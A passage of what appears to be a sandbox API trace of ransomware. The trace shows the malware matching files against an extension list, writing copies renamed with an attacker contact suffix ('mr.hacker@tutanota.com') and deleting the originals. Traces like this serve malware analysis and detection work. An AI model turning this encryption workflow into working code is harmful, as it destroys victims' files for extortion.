(lpString=".rar") returned 4 [0273.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString=".bz2") returned 4 [0273.460] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString=".7z") returned 3 [0273.460] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.460] lstrlenW (lpString=".dbf") returned 4 [0273.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.460] lstrlenW (lpString=".1cd") returned 4 [0273.460] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086424.WMF") returned 63 [0273.460] lstrlenW (lpString=".jpg") returned 4 [0273.460] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.461] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=21782) returned 1 [0273.461] CloseHandle (hObject=0x380) returned 1 [0273.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf")) returned 0x20 [0273.461] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.461] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.461] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.461] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.461] GetLastError () returned 0x0 [0273.461] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x5516, lpOverlapped=0x0) returned 1 [0273.463] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x5520, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x5520, lpOverlapped=0x0) returned 1 [0273.464] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.464] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.464] SetEndOfFile (hFile=0x3b4) returned 1 [0273.464] CloseHandle (hObject=0x3b4) returned 1 [0273.464] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.464] SetEndOfFile (hFile=0x380) returned 1 [0273.468] CloseHandle (hObject=0x380) returned 1 [0273.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086426.wmf")) returned 1 [0273.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.468] lstrlenW (lpString=".doc") returned 4 [0273.468] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.468] lstrlenW (lpString=".docx") returned 5 [0273.468] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0273.468] lstrlenW (lpString=".pdf") returned 4 [0273.468] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString=".xls") returned 4 [0273.469] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.469] lstrlenW (lpString=".xlsx") returned 5 [0273.469] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0273.469] lstrlenW (lpString=".ppt") returned 4 [0273.469] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.469] lstrlenW (lpString=".zip") returned 4 [0273.469] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.469] lstrlenW (lpString=".rar") returned 4 [0273.469] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString=".bz2") returned 4 [0273.469] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString=".7z") returned 3 [0273.469] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.469] lstrlenW (lpString=".dbf") returned 4 [0273.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.469] lstrlenW (lpString=".1cd") returned 4 [0273.469] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086426.WMF") returned 63 [0273.469] lstrlenW (lpString=".jpg") returned 4 [0273.469] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.470] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=35346) returned 1 [0273.470] CloseHandle (hObject=0x380) returned 1 [0273.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf")) returned 0x20 [0273.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.471] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.471] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.471] GetLastError () returned 0x0 [0273.471] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x8a12, lpOverlapped=0x0) returned 1 [0273.473] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x8a20, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x8a20, lpOverlapped=0x0) returned 1 [0273.474] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.474] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.474] SetEndOfFile (hFile=0x3b4) returned 1 [0273.474] CloseHandle (hObject=0x3b4) returned 1 [0273.474] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.474] SetEndOfFile (hFile=0x380) returned 1 [0273.477] CloseHandle (hObject=0x380) returned 1 [0273.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086428.wmf")) returned 1 [0273.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.477] lstrlenW (lpString=".doc") returned 4 [0273.477] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.477] lstrlenW (lpString=".docx") returned 5 [0273.477] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0273.477] lstrlenW (lpString=".pdf") returned 4 [0273.477] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.477] lstrlenW (lpString=".xls") returned 4 [0273.477] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.478] lstrlenW (lpString=".xlsx") returned 5 [0273.478] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0273.478] lstrlenW (lpString=".ppt") returned 4 [0273.478] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.478] lstrlenW (lpString=".zip") returned 4 [0273.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.478] lstrlenW (lpString=".rar") returned 4 [0273.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.478] lstrlenW (lpString=".bz2") returned 4 [0273.478] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.478] lstrlenW (lpString=".7z") returned 3 [0273.478] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.478] lstrlenW (lpString=".dbf") returned 4 [0273.478] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.478] lstrlenW (lpString=".1cd") returned 4 [0273.478] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086428.WMF") returned 63 [0273.478] lstrlenW (lpString=".jpg") returned 4 [0273.478] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.479] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=33434) returned 1 [0273.479] CloseHandle (hObject=0x380) returned 1 [0273.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf")) returned 0x20 [0273.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.479] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.479] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.479] GetLastError () returned 0x0 [0273.479] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x829a, lpOverlapped=0x0) returned 1 [0273.481] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x82a0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x82a0, lpOverlapped=0x0) returned 1 [0273.482] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.482] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.482] SetEndOfFile (hFile=0x3b4) returned 1 [0273.482] CloseHandle (hObject=0x3b4) returned 1 [0273.483] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.483] SetEndOfFile (hFile=0x380) returned 1 [0273.485] CloseHandle (hObject=0x380) returned 1 [0273.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086432.wmf")) returned 1 [0273.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.485] lstrlenW (lpString=".doc") returned 4 [0273.485] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.485] lstrlenW (lpString=".docx") returned 5 [0273.485] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0273.485] lstrlenW (lpString=".pdf") returned 4 [0273.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.485] lstrlenW (lpString=".xls") returned 4 [0273.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.485] lstrlenW (lpString=".xlsx") returned 5 [0273.485] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0273.485] lstrlenW (lpString=".ppt") returned 4 [0273.486] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.486] lstrlenW (lpString=".zip") returned 4 [0273.486] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.486] lstrlenW (lpString=".rar") returned 4 [0273.486] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.486] lstrlenW (lpString=".bz2") returned 4 [0273.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.486] lstrlenW (lpString=".7z") returned 3 [0273.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.486] lstrlenW (lpString=".dbf") returned 4 [0273.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.486] lstrlenW (lpString=".1cd") returned 4 [0273.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086432.WMF") returned 63 [0273.486] lstrlenW (lpString=".jpg") returned 4 [0273.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.486] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=14174) returned 1 [0273.486] CloseHandle (hObject=0x380) returned 1 [0273.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf")) returned 0x20 [0273.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.487] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.487] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0273.487] GetLastError () returned 0x0 [0273.487] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x375e, lpOverlapped=0x0) returned 1 [0273.791] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x3760, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x3760, lpOverlapped=0x0) returned 1 [0273.792] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.792] WriteFile (in: hFile=0x3b4, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.792] SetEndOfFile (hFile=0x3b4) returned 1 [0273.792] CloseHandle (hObject=0x3b4) returned 1 [0273.792] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.792] SetEndOfFile (hFile=0x380) returned 1 [0273.832] CloseHandle (hObject=0x380) returned 1 [0273.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0086478.wmf")) returned 1 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.834] lstrlenW (lpString=".doc") returned 4 [0273.834] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.834] lstrlenW (lpString=".docx") returned 5 [0273.834] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0273.834] lstrlenW (lpString=".pdf") returned 4 [0273.835] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString=".xls") returned 4 [0273.835] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.835] lstrlenW (lpString=".xlsx") returned 5 [0273.835] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0273.835] lstrlenW (lpString=".ppt") returned 4 [0273.835] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.835] lstrlenW (lpString=".zip") returned 4 [0273.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.835] lstrlenW (lpString=".rar") returned 4 [0273.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString=".bz2") returned 4 [0273.835] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString=".7z") returned 3 [0273.835] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.835] lstrlenW (lpString=".dbf") returned 4 [0273.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.835] lstrlenW (lpString=".1cd") returned 4 [0273.835] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0086478.WMF") returned 63 [0273.835] lstrlenW (lpString=".jpg") returned 4 [0273.835] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.852] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.852] SetFilePointerEx (in: hFile=0x2bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.147] GetLastError () returned 0x0 [0274.147] ReadFile (in: hFile=0x2bc, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x559a, lpOverlapped=0x0) returned 1 [0274.152] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x55a0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x55a0, lpOverlapped=0x0) returned 1 [0274.153] ReadFile (in: hFile=0x2bc, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.153] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, 